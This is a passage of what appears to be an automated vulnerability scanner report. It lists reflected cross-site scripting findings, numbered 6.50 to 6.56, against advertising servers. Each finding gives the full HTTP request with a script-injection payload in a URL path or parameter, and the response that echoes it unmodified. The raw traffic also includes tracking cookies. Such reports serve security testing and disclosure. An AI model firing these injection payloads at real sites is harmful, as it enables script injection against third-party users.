Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; Dominos=247B3; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660; PizzaHut=ZapTrader

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:30 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 350
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/PizzaHut_2H/201008/18-49/All/1628408510/x90a7bd8"><script>alert(1)</script>f004eba3524/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

6.50. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc536"><script>alert(1)</script>fb81650d435 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTraderbc536"><script>alert(1)</script>fb81650d435/PizzaHut_2H/201008/18-49/All/11303658466@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P_mQR_AAUHosSsYda6b2ziXiP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sA2wsBAgUCAAQAAAAAFiXDZgAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBLYO64j-0TcqVDpD9lQfd4szFAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtwWDCnkP1am4XiC_5n1P5ao4AdRrg%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658466%29%3Buf%28%27c%27%2C+43438%2C+1303658466%29%3Buf%28%27r%27%2C+158848%2C+1303658466%29%3Bppv%288484%2C+%273204962049788973305%27%2C+1303658466%2C+1304263266%2C+43438%2C+25553%29%3Bppv%288484%2C+%273204962049788973305%27%2C+1303658466%2C+1304263266%2C+43438%2C+25553%29%3B&cnd=!vRxSdAiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCshfYCGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; Dominos=247B3; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660; PizzaHut=ZapTrader

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderbc536"><script>alert(1)</script>fb81650d435/PizzaHut_2H/201008/18-49/All/457266541/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

6.51. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ec85"><script>alert(1)</script>df5ffb3524b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/PizzaHut_2H5ec85"><script>alert(1)</script>df5ffb3524b/201008/18-49/All/11303658466@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P_mQR_AAUHosSsYda6b2ziXiP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sA2wsBAgUCAAQAAAAAFiXDZgAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBLYO64j-0TcqVDpD9lQfd4szFAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtwWDCnkP1am4XiC_5n1P5ao4AdRrg%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658466%29%3Buf%28%27c%27%2C+43438%2C+1303658466%29%3Buf%28%27r%27%2C+158848%2C+1303658466%29%3Bppv%288484%2C+%273204962049788973305%27%2C+1303658466%2C+1304263266%2C+43438%2C+25553%29%3Bppv%288484%2C+%273204962049788973305%27%2C+1303658466%2C+1304263266%2C+43438%2C+25553%29%3B&cnd=!vRxSdAiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCshfYCGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; Dominos=247B3; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660; PizzaHut=ZapTrader

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/PizzaHut_2H5ec85"><script>alert(1)</script>df5ffb3524b/201008/18-49/All/938540333/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

6.52. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17909"><script>alert(1)</script>e7aa5c9187 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/PizzaHut_2H/20100817909"><script>alert(1)</script>e7aa5c9187/18-49/All/11303658466@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P_mQR_AAUHosSsYda6b2ziXiP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sA2wsBAgUCAAQAAAAAFiXDZgAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBLYO64j-0TcqVDpD9lQfd4szFAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtwWDCnkP1am4XiC_5n1P5ao4AdRrg%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658466%29%3Buf%28%27c%27%2C+43438%2C+1303658466%29%3Buf%28%27r%27%2C+158848%2C+1303658466%29%3Bppv%288484%2C+%273204962049788973305%27%2C+1303658466%2C+1304263266%2C+43438%2C+25553%29%3Bppv%288484%2C+%273204962049788973305%27%2C+1303658466%2C+1304263266%2C+43438%2C+25553%29%3B&cnd=!vRxSdAiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCshfYCGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; Dominos=247B3; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660; PizzaHut=ZapTrader

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/PizzaHut_2H/20100817909"><script>alert(1)</script>e7aa5c9187/18-49/All/1536739472/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

6.53. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84068"><script>alert(1)</script>d77015b57b8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/PizzaHut_2H/201008/18-4984068"><script>alert(1)</script>d77015b57b8/All/11303658466@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P_mQR_AAUHosSsYda6b2ziXiP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sA2wsBAgUCAAQAAAAAFiXDZgAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBLYO64j-0TcqVDpD9lQfd4szFAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtwWDCnkP1am4XiC_5n1P5ao4AdRrg%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658466%29%3Buf%28%27c%27%2C+43438%2C+1303658466%29%3Buf%28%27r%27%2C+158848%2C+1303658466%29%3Bppv%288484%2C+%273204962049788973305%27%2C+1303658466%2C+1304263266%2C+43438%2C+25553%29%3Bppv%288484%2C+%273204962049788973305%27%2C+1303658466%2C+1304263266%2C+43438%2C+25553%29%3B&cnd=!vRxSdAiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCshfYCGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; Dominos=247B3; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660; PizzaHut=ZapTrader

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/PizzaHut_2H/201008/18-4984068"><script>alert(1)</script>d77015b57b8/All/922055685/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

6.54. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fdc7"><script>alert(1)</script>a212e1ad9d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/PizzaHut_2H/201008/18-49/All4fdc7"><script>alert(1)</script>a212e1ad9d/11303658466@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P_mQR_AAUHosSsYda6b2ziXiP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sA2wsBAgUCAAQAAAAAFiXDZgAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBLYO64j-0TcqVDpD9lQfd4szFAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtwWDCnkP1am4XiC_5n1P5ao4AdRrg%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658466%29%3Buf%28%27c%27%2C+43438%2C+1303658466%29%3Buf%28%27r%27%2C+158848%2C+1303658466%29%3Bppv%288484%2C+%273204962049788973305%27%2C+1303658466%2C+1304263266%2C+43438%2C+25553%29%3Bppv%288484%2C+%273204962049788973305%27%2C+1303658466%2C+1304263266%2C+43438%2C+25553%29%3B&cnd=!vRxSdAiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCshfYCGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; Dominos=247B3; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660; PizzaHut=ZapTrader

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/PizzaHut_2H/201008/18-49/All4fdc7"><script>alert(1)</script>a212e1ad9d/1461025684/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

6.55. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42251"><script>alert(1)</script>bf7ed0eb8b5 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x9042251"><script>alert(1)</script>bf7ed0eb8b5 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P_mQR_AAUHosSsYda6b2ziXiP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sA2wsBAgUCAAQAAAAAFiXDZgAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBLYO64j-0TcqVDpD9lQfd4szFAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtwWDCnkP1am4XiC_5n1P5ao4AdRrg%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658466%29%3Buf%28%27c%27%2C+43438%2C+1303658466%29%3Buf%28%27r%27%2C+158848%2C+1303658466%29%3Bppv%288484%2C+%273204962049788973305%27%2C+1303658466%2C+1304263266%2C+43438%2C+25553%29%3Bppv%288484%2C+%273204962049788973305%27%2C+1303658466%2C+1304263266%2C+43438%2C+25553%29%3B&cnd=!vRxSdAiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCshfYCGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; Dominos=247B3; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660; PizzaHut=ZapTrader

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:47 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 349
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/PizzaHut_2H/201008/18-49/All/932761797/x9042251"><script>alert(1)</script>bf7ed0eb8b5/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

6.56. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ifl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the ifl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1d44"%3balert(1)//f5b11ca5280 was submitted in the ifl parameter. This input was echoed as b1d44";alert(1)//f5b11ca5280 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2419013&PluID=0&w=300&h=250&ord=4783842&ifrm=1&ucm=true&ifl=$$http://www.pcworld.com/eyeblaster/addineyeV2.html$$b1d44"%3balert(1)//f5b11ca5280&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3af3/3/0/%2a/s%3B237554731%3B0-0%3B0%3B28183772%3B4252-336/280%3B41666872/41684659/1%3B%3B%7Eaopt%3D2/1/64/0%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article;pg=article;aid=149142;c=2206;c=1746;c=2210;pos=2-336showcase;tile=9;sz=336x280;ord=02880823?;c=win7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; eyeblaster=FLV=10.2154&RES=128&WMPV=0; A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001jcM0aFSa04m400000eDVwaDPh084o00001gY2paFS+09nl00003hH4jaFhv09wy00001jcL+aFTt04m400000hEI2aE.a09B400001jmnFaEUX09SF00002johvaFxN07uh00002hUDyaFGt0cbS00001i54CaFsN09MT00000eDVtaDP.084o00001jeoLaF6J07Hs00001j8QYaEBz07LU00001igT+aFh30cXt00001hUBuaFGt0cbS00001iBU1aEBz0aVU000019rW0aFGt04uw00001; B3=7.Wt0000000001ui9cTR0000000001uf8Dka0000000001uh9abz0000000000ui52BU0000000001ui8TfJ0000000001uh93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui78O70000000001ud9gdG0000000001uh8z+.0000000001uh9pRI0000000002ug9iae0000000001uh7.Ws0000000001ui99y10000000001ui80Dr0000000003uj

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001eDVwaDPh084o00001jcM0aFSa04m400000gY2paFS+09nl00003hH4jaFhv09wy00001jmnFaEUX09SF00002hEI2aE.a09B400001jcL+aFTt04m400000johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGt0cbS00001j2fUaFWl07aw00001eDVtaDP.084o00001jeoLaF6J07Hs00001j8QYaEBz07LU00001hUBuaFGt0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001; expires=Sat, 23-Jul-2011 15:49:47 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7.Wt0000000001ui8Dka0000000001uh9cTR0000000001uf52BU0000000001ui9abz0000000000ui9eB50000000001uj8TfJ0000000001uh93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh80Dr0000000003uj99y10000000001ui7.Ws0000000001ui; expires=Sat, 23-Jul-2011 15:49:47 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 24 Apr 2011 19:49:46 GMT
Connection: close
Content-Length: 1705

